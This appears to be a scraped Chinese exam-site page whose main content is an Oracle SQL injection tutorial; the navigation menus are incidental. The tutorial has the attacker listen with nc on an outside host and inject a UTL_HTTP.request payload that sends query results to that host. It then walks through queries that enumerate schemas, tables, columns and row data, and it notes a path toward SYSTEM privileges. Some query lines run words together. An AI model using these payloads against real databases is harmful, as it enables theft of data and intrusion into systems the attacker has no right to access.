| 首页 考试吧论坛 Exam8视线 考试商城 网络课程 模拟考试 考友录 实用文档 求职招聘 论文下载 | ||
| 2011中考 | 2011高考 | 2012考研 | 考研培训 | 在职研 | 自学考试 | 成人高考 | 法律硕士 | MBA考试 MPA考试 | 中科院 |
||
| 四六级 | 职称英语 | 商务英语 | 公共英语 | 托福 | 雅思 | 专四专八 | 口译笔译 | 博思 | GRE GMAT 新概念英语 | 成人英语三级 | 申硕英语 | 攻硕英语 | 职称日语 | 日语学习 | 法语 | 德语 | 韩语 |
||
| 计算机等级考试 | 软件水平考试 | 职称计算机 | 微软认证 | 思科认证 | Oracle认证 | Linux认证 华为认证 | Java认证 |
||
| 公务员 | 报关员 | 银行从业资格 | 证券从业资格 | 期货从业资格 | 司法考试 | 法律顾问 | 导游资格 报检员 | 教师资格 | 社会工作者 | 外销员 | 国际商务师 | 跟单员 | 单证员 | 物流师 | 价格鉴证师 人力资源 | 管理咨询师考试 | 秘书资格 | 心理咨询师考试 | 出版专业资格 | 广告师职业水平 驾驶员 | 网络编辑 |
||
| 卫生资格 | 执业医师 | 执业药师 | 执业护士 | ||
| 会计从业资格考试(会计证) | 经济师 | 会计职称 | 注册会计师 | 审计师 | 注册税务师 注册资产评估师 | 高级会计师 | ACCA | 统计师 | 精算师 | 理财规划师 | 国际内审师 |
||
| 一级建造师 | 二级建造师 | 造价工程师 | 造价员 | 咨询工程师 | 监理工程师 | 安全工程师 质量工程师 | 物业管理师 | 招标师 | 结构工程师 | 建筑师 | 房地产估价师 | 土地估价师 | 岩土师 设备监理师 | 房地产经纪人 | 投资项目管理师 | 土地登记代理人 | 环境影响评价师 | 环保工程师 城市规划师 | 公路监理师 | 公路造价师 | 安全评价师 | 电气工程师 | 注册测绘师 | 注册计量师 |
||
| 缤纷校园 | 实用文档 | 英语学习 | 作文大全 | 求职招聘 | 论文下载 | 访谈 | 游戏 | ||
首先外网nc监听对应的端口
and UTL_HTTP.request("外网ip:port/"(sql语句))=1--
爆库
select owner from all_tables where rownum=1
select owner from all_tables where owner<>"第一个库名"<--IWMS_AD_BEGIN-->
<--IWMS_AD_END-->
and rownum=1
select owner from all_tables where owner<>"第一个库名"
and owner<>"第二个"and rownum=1
select owner from all_tables where owner<>"第一个库名"
and owner<>"第一个库名" and rownum=1
以此论推
爆表
select TABLE_NAME from all_tables where owner="库名"
and rownum=1
select TABLE_NAME from all_tables where owner="库名"
and rownum=1 and TABLE_NAME<>"表名1"
select TABLE_NAME from all_tables where owner="库名"andrownum=1
and TABLE_NAME<>"表名1" and TABLE_NAME<>"表名2"
以此论推
爆列
select COLUMN_NAME from user_tab_columns wheretable_name="表名"
and rownum=1
select COLUMN_NAME from user_tab_columns wheretable_name="表名"
and rownum=1 and COLUMN_NAME<>"第一个爆出的列名"
select COLUMN_NAME from user_tab_columns wheretable_name="表名"
and rownum=1 and COLUMN_NAME<>"第一个爆出的列名"andCOLUMN_NAME<>"第二个爆出的列名"
爆内容
第一个内容:select 列名 from 表名 where rownum=1
第二个内容:select 列名 from 表名 where rownum=1 and 列名<>"第一个值"
第三个内容:select 列名 from 表名 where rownum=1 and 列名<>"第一个值"and列名<>"第二个值"
以此论推
注
1:在windows环境下,oracle是以服务的形式启动的,这样通过web注射就可以直接获得system权限(此部分内容正在整理测试阶段中,以供给大家更直观、简洁、有效的参考资料
2:针对unix和linux操作系统方面对于Oracle也会作出分析,相信Oracle注射将会成为转入高级Hack入侵的桥梁。